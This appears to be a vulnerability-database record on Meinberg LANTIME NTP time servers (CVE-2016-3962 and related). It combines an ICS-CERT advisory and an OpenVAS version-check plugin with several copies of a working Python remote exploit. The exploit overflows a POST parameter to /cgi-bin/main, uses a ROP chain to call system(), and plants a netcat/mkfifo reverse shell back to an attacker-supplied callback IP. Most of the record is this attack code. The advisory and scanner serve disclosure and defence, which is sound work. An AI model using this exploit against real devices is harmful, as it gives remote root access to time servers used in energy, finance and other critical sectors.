* 120\r\n \r\nmsg += struct.pack(\"I\", 0xB1E8B434 ) # ebx\r\nmsg += struct.pack(\"I\", some_str - 100 ) # esi\r\nmsg += struct.pack(\"I\", some_str - 100 ) # edi\r\nmsg += struct.pack(\"I\", some_str - 0x100 ) # ebp\r\nmsg += struct.pack(\"I\", stack_pivot ) # mov esp, ebp ; ret\r\nmsg += \"A\" * 100\r\n \r\nresp += \"Content-Length: \" + str(len(msg)) + \"\\r\\n\\r\\n\"\r\nresp += msg\r\ncsock.send(resp)\r\ncsock.close\r\n \r\ntime.sleep(1)\r\n \r\n###################################################################\r\n#\r\n# Trigger reverse shell \r\n# \r\n \r\ncsock = socket.socket( socket.AF_INET, socket.SOCK_STREAM)\r\ncsock.connect ( (host, int(port)) )\r\n \r\nparam = \"A\" * 0x2850\r\n \r\nresp = \"POST /cgi-bin/main HTTP/1.1\\r\\n\"\r\nresp += \"Host: \" + host + \"\\r\\n\"\r\nresp += \"User-Agent: Mozilla/5.0\\r\\n\"\r\nresp += \"Accept: text/html\\r\\n\"\r\nresp += \"Accept-Language: en-US\\r\\n\"\r\nresp += \"Connection: keep-alive\\r\\n\"\r\nresp += \"Content-Type: application/x-www-form-urlencoded\\r\\n\"\r\n \r\nsend_cmd = 0x807ED88\r\nsystem = 0x80490B0\r\nexit = 0x80492C0\r\nsome_str = 0x850BDB8\r\nret = 0x804CE65\r\n \r\n#stack pivot\r\nstack_pivot = 0x8049488\r\nmsg = \"button=\" + \"A\" * 9756\r\n \r\nmsg += \"B\" * 28\r\nmsg += struct.pack(\"I\", 0x7FFEE01A ) # ebp\r\nmsg += struct.pack(\"I\", 0x0804ce64 ) # pop eax ; ret\r\nmsg += struct.pack(\"I\", some_str - 0x100 ) # some place\r\nmsg += struct.pack(\"I\", 0x080855cc ) # add dword ptr [eax + 0x60], ebp ; ret\r\nmsg += struct.pack(\"I\", 0x080651d4 ) # inc dword ptr [ebx + 0x566808ec] ; ret\r\nmsg += struct.pack(\"I\", ret ) * (71/4)\r\n \r\nmsg += struct.pack(\"I\", send_cmd )\r\nmsg += struct.pack(\"I\", exit )\r\nmsg += struct.pack(\"I\", 0x800120f5 ) # [eax + 0x60]\r\nmsg += struct.pack(\"I\", some_str ) # buffer\r\nmsg += struct.pack(\"I\", 0xffffffff ) # count\r\nmsg += \"E\" * 120\r\n \r\nmsg += struct.pack(\"I\", 0xB1E8B434 ) # ebx\r\nmsg += struct.pack(\"I\", some_str - 100 ) # 
esi\r\nmsg += struct.pack(\"I\", some_str - 100 ) # edi\r\nmsg += struct.pack(\"I\", some_str - 0x100 ) # ebp\r\nmsg += struct.pack(\"I\", stack_pivot ) # mov esp, ebp ; ret\r\nmsg += \"A\" * 100\r\n \r\nresp += \"Content-Length: \" + str(len(msg)) + \"\\r\\n\\r\\n\"\r\nresp += msg\r\ncsock.send(resp)\r\ncsock.close()\r\n \r\ntime.sleep(1)\r\n \r\n \r\nprint \"[+] cleaning up\"\r\n###################################################################\r\n#\r\n# Kill all mains that are hung-up\r\n#\r\ncsock = socket.socket( socket.AF_INET, socket.SOCK_STREAM)\r\ncsock.connect ( (host, int(port)) )\r\n \r\nparam = \"A\" * 0x2850\r\n \r\nresp = \"POST /cgi-bin/main HTTP/1.1\\r\\n\"\r\nresp += \"Host: \" + host + \"\\r\\n\"\r\nresp += \"User-Agent: Mozilla/5.0\\r\\n\"\r\nresp += \"Accept: text/html\\r\\n\"\r\nresp += \"Accept-Language: en-US\\r\\n\"\r\nresp += \"Connection: keep-alive\\r\\n\"\r\nresp += \"Content-Type: application/x-www-form-urlencoded\\r\\n\"\r\n \r\nsystem = 0x80490B0\r\nexit = 0x80492C0\r\nsome_str = 0x850BDB8\r\n \r\ncommand = 'killall main'\r\n \r\nmsg = \"button=\" + \"A\"*10028\r\nmsg += struct.pack(\"I\", system )\r\nmsg += struct.pack(\"I\", exit )\r\nmsg += struct.pack(\"I\", some_str )\r\nmsg += command + \"\\x00\"\r\n \r\nresp += \"Content-Length: \" + str(len(msg)) + \"\\r\\n\\r\\n\"\r\nresp += msg\r\ncsock.send(resp)\r\ncsock.close()\r\n \r\nprint \"[+] enjoy\"\n\n# 0day.today [2018-04-08] #", "cvss": {"score": 8.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:NONE/"}, "sourceHref": "https://0day.today/exploit/25437"}], "openvas": [{"lastseen": "2020-05-18T17:26:09", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3989", "CVE-2016-3962", "CVE-2016-3988"], "description": "Meinberg LANTIME is prone to multiple vulnerabilies.", "modified": "2020-05-14T00:00:00", "published": "2016-06-24T00:00:00", "id": "OPENVAS:1361412562310106110", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106110", "type": 
"openvas", "title": "Meinberg LANTIME < 6.20.004 Multiple Vulnerabilities", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Meinberg LANTIME Multiple Vulnerabilities\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106110\");\n script_version(\"2020-05-14T13:01:46+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-14 13:01:46 +0000 (Thu, 14 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-06-24 16:45:17 +0700 (Fri, 24 Jun 2016)\");\n script_tag(name:\"cvss_base\", value:\"8.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:N\");\n\n script_cve_id(\"CVE-2016-3962\", \"CVE-2016-3988\", \"CVE-2016-3989\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Meinberg LANTIME < 6.20.004 Multiple Vulnerabilities\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2016 Greenbone Networks 
GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_meinberg_lantime_detect.nasl\");\n script_mandatory_keys(\"meinberg_lantime/detected\");\n\n script_tag(name:\"summary\", value:\"Meinberg LANTIME is prone to multiple vulnerabilies.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Meinberg LANTIME is prone to multiple vulnerabilies:\n\n Remote stack buffer overflow vulnerability involving parsing of parameter in POST request in function\n provides privilege of web server 'nobody'. (CVE-2016-3962)\n\n Remote stack buffer overflow vulnerability is present while parsing nine different parameters in POST\n request in function. (CVE-2016-3988)\n\n Weak access controls allow for privilege escalation from 'nobody' to 'root' user. 'nobody' has permissions\n to alter script that can only run as 'root'. (CVE-2016-3989)\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of these vulnerabilities could cause a buffer\n overflow condition that may allow escalation to root privileges.\");\n\n script_tag(name:\"affected\", value:\"Version prior to 6.20.004 on IMS-LANTIME M3000, IMS-LANTIME M1000,\n IMS-LANTIME M500, LANTIME M900, LANTIME M600, LANTIME M400, LANTIME M300, LANTIME M200 and LANTIME M100.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Version 6.20.004 or later.\");\n\n script_xref(name:\"URL\", value:\"https://ics-cert.us-cert.gov/advisories/ICSA-16-175-03\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\ncpe_list = make_list( \"cpe:/a:meinberg:lantime_m3000\",\n \"cpe:/a:meinberg:lantime_m1000\",\n \"cpe:/a:meinberg:lantime_m500\",\n \"cpe:/a:meinberg:lantime_m900\",\n \"cpe:/a:meinberg:lantime_m600\",\n \"cpe:/a:meinberg:lantime_m400\",\n \"cpe:/a:meinberg:lantime_m300\",\n \"cpe:/a:meinberg:lantime_m200\",\n \"cpe:/a:meinberg:lantime_m100\" );\n\nif( ! 
infos = get_app_version_from_list( cpe_list:cpe_list, nofork:TRUE ) )\n exit( 0 );\n\nvers = infos[\"version\"];\n\nif( version_is_less( version:vers, test_version:\"6.20.004\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"6.20.004\" );\n security_message( port:0, data:report );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:N"}}], "ics": [{"lastseen": "2021-02-27T19:53:35", "bulletinFamily": "info", "cvelist": ["CVE-2016-3962", "CVE-2016-39688", "CVE-2016-3988", "CVE-2016-3989"], "description": "## OVERVIEW\n\nIndependent researcher Ryan Wincey has identified a stack buffer overflow vulnerability and a privilege escalation vulnerability in Meinberg\u2019s NTP Time Servers Interface. Meinberg has produced a new Version 6.20.004 to mitigate these vulnerabilities. The researcher has validated the firmware update. He confirms the update fixes these vulnerabilities.\n\nThese vulnerabilities could be exploited remotely.\n\n## AFFECTED PRODUCTS\n\nThe following Meinberg products are affected:\n\n * IMS-LANTIME M3000 Version 6.0 and earlier,\n * IMS-LANTIME M1000 Version 6.0 and earlier,\n * IMS-LANTIME M500 Version 6.0 and earlier,\n * LANTIME M900 Version 6.0 and earlier,\n * LANTIME M600 Version 6.0 and earlier,\n * LANTIME M400 Version 6.0 and earlier,\n * LANTIME M300 Version 6.0 and earlier,\n * LANTIME M200 Version 6.0 and earlier,\n * LANTIME M100 Version 6.0 and earlier,\n * SyncFire 1100 Version 6.0 and earlier, and\n * LCES Version 6.0 and earlier.\n\n## IMPACT\n\nSuccessful exploitation of these vulnerabilities could cause a buffer overflow condition that may allow escalation to root privileges.\n\nImpact to individual organizations depends on many factors that are unique to each organization. 
NCCIC/ICS-CERT recommends that organizations evaluate the impact of these vulnerabilities based on their operational environment, architecture, and product implementation.\n\n## BACKGROUND\n\nMeinberg is a Germany-based company that maintains offices around the world, including North America, South America, Europe, Asia, Africa, and Australia.\n\nThe affected products are NTP Time Servers. According to Meinberg, IMS-LANTIME, LANTIME, SyncFire, and LCES Series are deployed across several sectors including Communications, Defense Industrial Base, Energy, Financial Services, Transportation Systems, and others. Meinberg estimates that these products are used worldwide.\n\n## VULNERABILITY CHARACTERIZATION\n\n### VULNERABILITY OVERVIEW\n\n### STACK-BASED BUFFER OVERFLOWa\n\nRemote stack buffer overflow vulnerability involving parsing of parameter in POST request in function provides privilege of web server \u201cnobody.\u201d\n\nCVE-2016-3962b has been assigned to this vulnerability. A CVSS v3 base score of 7.3 has been assigned; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L).c\n\n### STACK-BASED BUFFER OVERFLOWd\n\nRemote stack buffer overflow vulnerability is present while parsing nine different parameters in POST request in function.\n\nCVE-2016-3988e has been assigned to this vulnerability. A CVSS v3 base score of 7.3 has been assigned; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/ C:L/I:L/A:L).f\n\n### PRIVILEGE ESCALATIONg\n\nWeak access controls allow for privilege escalation from \u201cnobody\u201d to \u201croot\u201d user. \u201cnobody\u201d has permissions to alter script that can only run as \u201croot.\u201d\n\nCVE-2016-3989h has been assigned to this vulnerability. 
A CVSS v3 base score of 8.1 has been assigned; the CVSS vector string is (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N).i\n\n### VULNERABILITY DETAILS\n\n#### EXPLOITABILITY\n\nThese vulnerabilities could be exploited remotely.\n\n#### EXISTENCE OF EXPLOIT\n\nNo known public exploits specifically target these vulnerabilities.\n\n#### DIFFICULTY\n\nAn attacker with a low skill would be able to exploit these vulnerabilities.\n\n## MITIGATION\n\nMeinberg has produced a new firmware Version 6.20.004. The new firmware can be downloaded by using the link below:\n\n[https://urldefense.proofpoint.com/v2/url?u=http-3A__www.meinberg.de_download_firmware_lantime_v6_firmware-2D6.20.004-2Dx86.rel&d=BQIFaQ&c=54IZrppPQZKX9mLzcGdPfFD1hxrcB__aEkJFOKJFd00&r=zE5lG3CZZIbdBvT6slVAzQ&m=n4ZBSsrF-RphS7eiqohm3WcJ2BYQUCwQUHwVPHNFa6o&s=WlQnlBzw05tnJ1o29nmeXtGBbNubzjyRPqaWAdpXn5Y&e=](<https://urldefense.proofpoint.com/v2/url?u=http-3A__www.meinberg.de_download_firmware_lantime_v6_firmware-2D6.20.004-2Dx86.rel&d=BQIFaQ&c=54IZrppPQZKX9mLzcGdPfFD1hxrcB__aEkJFOKJFd00&r=zE5lG3CZZIbdBvT6slVAzQ&m=n4ZBSsrF-RphS7eiqohm3WcJ2BYQUCwQUHwVPHNFa6o&s=WlQnlBzw05tnJ1o29nmeXtGBbNubzjyRPqaWAdpXn5Y&e=>)\n\nICS-CERT recommends that users take defensive measures to minimize the risk of exploitation of these vulnerabilities. Specifically, users should:\n\n * Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.\n * Locate control system networks and remote devices behind firewalls, and isolate them from the business network.\n * When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. 
Also recognize that VPN is only as secure as the connected devices.\n\nICS-CERT reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.\n\nICS-CERT also provides a section for control systems security recommended practices on the ICS-CERT web page at: http://ics-cert.us-cert.gov/content/recommended-practices. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.\n\nAdditional mitigation guidance and recommended practices are publicly available in the ICS\u2011CERT Technical Information Paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies, that is available for download from the ICS-CERT web site (http://ics-cert.us-cert.gov/).\n\nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to ICS-CERT for tracking and correlation against other incidents.\n\n * aCWE-121: Stack-based Buffer Overflow, http://cwe.mitre.org/data/definitions/121.html, web site last accessed June 23, 2016.\n * bNVD, http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3962, NIST uses this advisory to create the CVE web site report. This web site will be active sometime after publication of this advisory.\n * cCVSS Calculator, https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L, web site last accessed June 23, 2016.\n * dCWE-121: Stack-based Buffer Overflow, http://cwe.mitre.org/data/definitions/121.html, web site last accessed June 23, 2016.\n * eNVD, http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-39688, NIST uses this advisory to create the CVE web site report. 
This web site will be active sometime after publication of this advisory.\n * fCVSS Calculator, https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L, web site last accessed June 23, 2016.\n * gCWE-121: Stack-based Buffer Overflow, http://cwe.mitre.org/data/definitions/121.html, web site last accessed June 23, 2016.\n * hNVD, http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3989, NIST uses this advisory to create the CVE web site report. This web site will be active sometime after publication of this advisory.\n * iCVSS Calculator, https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N, web site last accessed June 23, 2016.\n\n## \nContact Information\n\nFor any questions related to this report, please contact the CISA at: \n \nEmail: [CISAservicedesk@cisa.dhs.gov](<mailto:cisaservicedesk@cisa.dhs.gov>) \nToll Free: 1-888-282-0870\n\nFor industrial control systems cybersecurity information: https://us-cert.cisa.gov/ics \nor incident reporting: https://us-cert.cisa.gov/report\n\nCISA continuously strives to improve its products and services. 
You can help by choosing one of the links below to provide feedback about this product.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ics/advisories/ICSA-16-175-03>); we'd welcome your feedback.\n", "modified": "2018-08-23T00:00:00", "published": "2016-06-23T00:00:00", "id": "ICSA-16-175-03", "href": "https://www.us-cert.gov/ics/advisories/ICSA-16-175-03", "type": "ics", "title": "Meinberg NTP Time Server Vulnerabilities", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:N"}}], "packetstorm": [{"lastseen": "2016-12-05T22:20:12", "description": "", "published": "2016-07-18T00:00:00", "type": "packetstorm", "title": "Meinberg NTP Time Server ELX800/GPS M4x 5.30p Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-3962"], "modified": "2016-07-18T00:00:00", "id": "PACKETSTORM:137947", "href": "https://packetstormsecurity.com/files/137947/Meinberg-NTP-Time-Server-ELX800-GPS-M4x-5.30p-Command-Execution.html", "sourceData": "`#!/usr/bin/python \n# \n# EDB Note: Source ~ https://github.com/securifera/CVE-2016-3962-Exploit \n# EDB Note: More info ~ https://www.securifera.com/blog/2016/07/17/time-to-patch-rce-on-meinberg-ntp-time-server/ \n# \n# 271 - trigger notifications \n# 299 - copy user defined notifications \n \n# Kernel Version: 2.6.15.1 \n# System Version: 530 \n# Lantime configuration utility 1.27 \n# ELX800/GPS M4x V5.30p \n \nimport socket \nimport struct \nimport telnetlib \nimport sys \nimport time \n \nif len(sys.argv) < 3: \nprint \"[-] <Host> <Callback IP> \" \nexit(1) \n \n \nhost = sys.argv[1] \ncallback_ip = sys.argv[2] \n \nprint \"[+] exploiting Meinburg M400\" \nport = 80 \n \n################################################################### \n# \n# Copy 
user_defined_notification to /www/filetmp \n# Append reverse shell string to /file/tmp \n# \ncsock = socket.socket( socket.AF_INET, socket.SOCK_STREAM) \ncsock.connect ( (host, int(port)) ) \n \nparam = \"A\" * 0x2850 \n \nresp = \"POST /cgi-bin/main HTTP/1.1\\r\\n\" \nresp += \"Host: \" + host + \"\\r\\n\" \nresp += \"User-Agent: Mozilla/5.0\\r\\n\" \nresp += \"Accept: text/html\\r\\n\" \nresp += \"Accept-Language: en-US\\r\\n\" \nresp += \"Connection: keep-alive\\r\\n\" \nresp += \"Content-Type: application/x-www-form-urlencoded\\r\\n\" \n \nsystem = 0x80490B0 \nexit = 0x80492C0 \nsome_str = 0x850BDB8 \n \n#must have a listener setup to receive the callback connection on ip 192.168.60.232 \n# i.e. nc -v -l -p 4444 \ncommand = 'cp /mnt/flash/config/user_defined_notification /www/filetmp; echo \"{rm,/tmp/foo};{mkfifo,/tmp/foo};/bin/bash</tmp/foo|{nc,' + callback_ip +'0,4444}>/tmp/foo;\" >> /www/filetmp' \n \nmsg = \"button=\" + \"A\"*10028 \nmsg += struct.pack(\"I\", system ) \nmsg += struct.pack(\"I\", exit ) \nmsg += struct.pack(\"I\", some_str ) \nmsg += command + \"\\x00\" \n \nresp += \"Content-Length: \" + str(len(msg)) + \"\\r\\n\\r\\n\" \nresp += msg \ncsock.send(resp) \ncsock.close() \n \ntime.sleep(1) \n \n################################################################### \n# \n# Copy /www/filetmp to user_defined_notification \n# \ncsock = socket.socket( socket.AF_INET, socket.SOCK_STREAM) \ncsock.connect ( (host, int(port)) ) \n \nparam = \"A\" * 0x2850 \n \nresp = \"POST /cgi-bin/main HTTP/1.1\\r\\n\" \nresp += \"Host: \" + host + \"\\r\\n\" \nresp += \"User-Agent: Mozilla/5.0\\r\\n\" \nresp += \"Accept: text/html\\r\\n\" \nresp += \"Accept-Language: en-US\\r\\n\" \nresp += \"Connection: keep-alive\\r\\n\" \nresp += \"Content-Type: application/x-www-form-urlencoded\\r\\n\" \n \nsend_cmd = 0x807ED88 \nsystem = 0x80490B0 \nexit = 0x80492C0 \nsome_str = 0x850BDB8 \nret = 0x804CE65 \n \n#stack pivot \nstack_pivot = 0x8049488 \nmsg = \"button=\" + \"A\" * 
9756 \n \nmsg += \"B\" * 28 \nmsg += struct.pack(\"I\", 0x7FFEE01A ) # ebp \nmsg += struct.pack(\"I\", 0x0804ce64 ) # pop eax ; ret \nmsg += struct.pack(\"I\", some_str - 0x100 ) # some place \nmsg += struct.pack(\"I\", 0x080855cc ) # add dword ptr [eax + 0x60], ebp ; ret \nmsg += struct.pack(\"I\", 0x080651d4 ) # inc dword ptr [ebx + 0x566808ec] ; ret \nmsg += struct.pack(\"I\", ret ) * (71/4) \n \nmsg += struct.pack(\"I\", send_cmd ) \nmsg += struct.pack(\"I\", exit ) \nmsg += struct.pack(\"I\", 0x80012111 ) # [eax + 0x60] \nmsg += struct.pack(\"I\", some_str ) # buffer \nmsg += struct.pack(\"I\", 0xffffffff ) # count \nmsg += \"E\" * 120 \n \nmsg += struct.pack(\"I\", 0xB1E8B434 ) # ebx \nmsg += struct.pack(\"I\", some_str - 100 ) # esi \nmsg += struct.pack(\"I\", some_str - 100 ) # edi \nmsg += struct.pack(\"I\", some_str - 0x100 ) # ebp \nmsg += struct.pack(\"I\", stack_pivot ) # mov esp, ebp ; ret \nmsg += \"A\" * 100 \n \nresp += \"Content-Length: \" + str(len(msg)) + \"\\r\\n\\r\\n\" \nresp += msg \ncsock.send(resp) \ncsock.close \n \ntime.sleep(1) \n \n################################################################### \n# \n# Trigger reverse shell \n# \n \ncsock = socket.socket( socket.AF_INET, socket.SOCK_STREAM) \ncsock.connect ( (host, int(port)) ) \n \nparam = \"A\" * 0x2850 \n \nresp = \"POST /cgi-bin/main HTTP/1.1\\r\\n\" \nresp += \"Host: \" + host + \"\\r\\n\" \nresp += \"User-Agent: Mozilla/5.0\\r\\n\" \nresp += \"Accept: text/html\\r\\n\" \nresp += \"Accept-Language: en-US\\r\\n\" \nresp += \"Connection: keep-alive\\r\\n\" \nresp += \"Content-Type: application/x-www-form-urlencoded\\r\\n\" \n \nsend_cmd = 0x807ED88 \nsystem = 0x80490B0 \nexit = 0x80492C0 \nsome_str = 0x850BDB8 \nret = 0x804CE65 \n \n#stack pivot \nstack_pivot = 0x8049488 \nmsg = \"button=\" + \"A\" * 9756 \n \nmsg += \"B\" * 28 \nmsg += struct.pack(\"I\", 0x7FFEE01A ) # ebp \nmsg += struct.pack(\"I\", 0x0804ce64 ) # pop eax ; ret \nmsg += struct.pack(\"I\", some_str - 0x100 ) # 
some place \nmsg += struct.pack(\"I\", 0x080855cc ) # add dword ptr [eax + 0x60], ebp ; ret \nmsg += struct.pack(\"I\", 0x080651d4 ) # inc dword ptr [ebx + 0x566808ec] ; ret \nmsg += struct.pack(\"I\", ret ) * (71/4) \n \nmsg += struct.pack(\"I\", send_cmd ) \nmsg += struct.pack(\"I\", exit ) \nmsg += struct.pack(\"I\", 0x800120f5 ) # [eax + 0x60] \nmsg += struct.pack(\"I\", some_str ) # buffer \nmsg += struct.pack(\"I\", 0xffffffff ) # count \nmsg += \"E\" * 120 \n \nmsg += struct.pack(\"I\", 0xB1E8B434 ) # ebx \nmsg += struct.pack(\"I\", some_str - 100 ) # esi \nmsg += struct.pack(\"I\", some_str - 100 ) # edi \nmsg += struct.pack(\"I\", some_str - 0x100 ) # ebp \nmsg += struct.pack(\"I\", stack_pivot ) # mov esp, ebp ; ret \nmsg += \"A\" * 100 \n \nresp += \"Content-Length: \" + str(len(msg)) + \"\\r\\n\\r\\n\" \nresp += msg \ncsock.send(resp) \ncsock.close() \n \ntime.sleep(1) \n \n \nprint \"[+] cleaning up\" \n################################################################### \n# \n# Kill all mains that are hung-up \n# \ncsock = socket.socket( socket.AF_INET, socket.SOCK_STREAM) \ncsock.connect ( (host, int(port)) ) \n \nparam = \"A\" * 0x2850 \n \nresp = \"POST /cgi-bin/main HTTP/1.1\\r\\n\" \nresp += \"Host: \" + host + \"\\r\\n\" \nresp += \"User-Agent: Mozilla/5.0\\r\\n\" \nresp += \"Accept: text/html\\r\\n\" \nresp += \"Accept-Language: en-US\\r\\n\" \nresp += \"Connection: keep-alive\\r\\n\" \nresp += \"Content-Type: application/x-www-form-urlencoded\\r\\n\" \n \nsystem = 0x80490B0 \nexit = 0x80492C0 \nsome_str = 0x850BDB8 \n \ncommand = 'killall main' \n \nmsg = \"button=\" + \"A\"*10028 \nmsg += struct.pack(\"I\", system ) \nmsg += struct.pack(\"I\", exit ) \nmsg += struct.pack(\"I\", some_str ) \nmsg += command + \"\\x00\" \n \nresp += \"Content-Length: \" + str(len(msg)) + \"\\r\\n\\r\\n\" \nresp += msg \ncsock.send(resp) \ncsock.close() \n \nprint \"[+] enjoy\" \n \n`\n", "cvss": {"score": 7.5, "vector": 
"AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/137947/meinbergntp-exec.txt"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:31", "description": "\nMeinberg NTP Time Server ELX800GPS M4x V5.30p - Remote Command Execution Escalate Privileges", "edition": 1, "published": "2016-07-17T00:00:00", "title": "Meinberg NTP Time Server ELX800GPS M4x V5.30p - Remote Command Execution Escalate Privileges", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-3962"], "modified": "2016-07-17T00:00:00", "id": "EXPLOITPACK:D34BF86AC539AEBAEDB8B3FFCD3F9B4B", "href": "", "sourceData": "#!/usr/bin/python\n#\n# EDB Note: Source ~ https://github.com/securifera/CVE-2016-3962-Exploit\n# EDB Note: More info ~ https://www.securifera.com/blog/2016/07/17/time-to-patch-rce-on-meinberg-ntp-time-server/\n#\n# 271 - trigger notifications\n# 299 - copy user defined notifications\n\n# Kernel Version: 2.6.15.1\n# System Version: 530 \n# Lantime configuration utility 1.27\n# ELX800/GPS M4x V5.30p\n\nimport socket\nimport struct\nimport telnetlib\nimport sys\nimport time\n\nif len(sys.argv) < 3:\n\tprint \"[-] <Host> <Callback IP> \"\n\texit(1)\n\n\t\nhost = sys.argv[1]\ncallback_ip = sys.argv[2]\n\nprint \"[+] exploiting Meinburg M400\"\nport = 80\n\n###################################################################\n#\n# Copy user_defined_notification to /www/filetmp\n# Append reverse shell string to /file/tmp\t\n#\ncsock = socket.socket( socket.AF_INET, socket.SOCK_STREAM)\ncsock.connect ( (host, int(port)) )\n\nparam = \"A\" * 0x2850\n\nresp = \"POST /cgi-bin/main HTTP/1.1\\r\\n\"\nresp += \"Host: \" + host + \"\\r\\n\"\nresp += \"User-Agent: Mozilla/5.0\\r\\n\"\nresp += \"Accept: text/html\\r\\n\"\nresp += \"Accept-Language: en-US\\r\\n\"\nresp += \"Connection: keep-alive\\r\\n\"\nresp += \"Content-Type: application/x-www-form-urlencoded\\r\\n\"\n\nsystem = 0x80490B0\nexit = 0x80492C0\nsome_str = 
0x850BDB8\n\n#must have a listener setup to receive the callback connection on ip 192.168.60.232\n# i.e. nc -v -l -p 4444\ncommand = 'cp /mnt/flash/config/user_defined_notification /www/filetmp; echo \"{rm,/tmp/foo};{mkfifo,/tmp/foo};/bin/bash</tmp/foo|{nc,' + callback_ip +'0,4444}>/tmp/foo;\" >> /www/filetmp'\n\nmsg = \"button=\" + \"A\"*10028 \nmsg += struct.pack(\"I\", system )\nmsg += struct.pack(\"I\", exit )\nmsg += struct.pack(\"I\", some_str )\nmsg += command + \"\\x00\"\n\nresp += \"Content-Length: \" + str(len(msg)) + \"\\r\\n\\r\\n\"\nresp += msg\ncsock.send(resp)\ncsock.close()\n\ntime.sleep(1)\n\n###################################################################\n#\n# Copy /www/filetmp to user_defined_notification\t\n# \ncsock = socket.socket( socket.AF_INET, socket.SOCK_STREAM)\ncsock.connect ( (host, int(port)) )\n\nparam = \"A\" * 0x2850\n\nresp = \"POST /cgi-bin/main HTTP/1.1\\r\\n\"\nresp += \"Host: \" + host + \"\\r\\n\"\nresp += \"User-Agent: Mozilla/5.0\\r\\n\"\nresp += \"Accept: text/html\\r\\n\"\nresp += \"Accept-Language: en-US\\r\\n\"\nresp += \"Connection: keep-alive\\r\\n\"\nresp += \"Content-Type: application/x-www-form-urlencoded\\r\\n\"\n\nsend_cmd = 0x807ED88\nsystem = 0x80490B0\nexit = 0x80492C0\nsome_str = 0x850BDB8\nret = 0x804CE65\n\n#stack pivot\nstack_pivot = 0x8049488\nmsg = \"button=\" + \"A\" * 9756\n\nmsg += \"B\" * 28\nmsg += struct.pack(\"I\", 0x7FFEE01A ) # ebp\nmsg += struct.pack(\"I\", 0x0804ce64 ) # pop eax ; ret\nmsg += struct.pack(\"I\", some_str - 0x100 ) # some place\nmsg += struct.pack(\"I\", 0x080855cc ) # add dword ptr [eax + 0x60], ebp ; ret\nmsg += struct.pack(\"I\", 0x080651d4 ) # inc dword ptr [ebx + 0x566808ec] ; ret\nmsg += struct.pack(\"I\", ret ) * (71/4)\n\nmsg += struct.pack(\"I\", send_cmd )\nmsg += struct.pack(\"I\", exit )\nmsg += struct.pack(\"I\", 0x80012111 ) # [eax + 0x60]\nmsg += struct.pack(\"I\", some_str ) # buffer\nmsg += struct.pack(\"I\", 0xffffffff ) # count\nmsg += \"E\" * 120\n\nmsg 
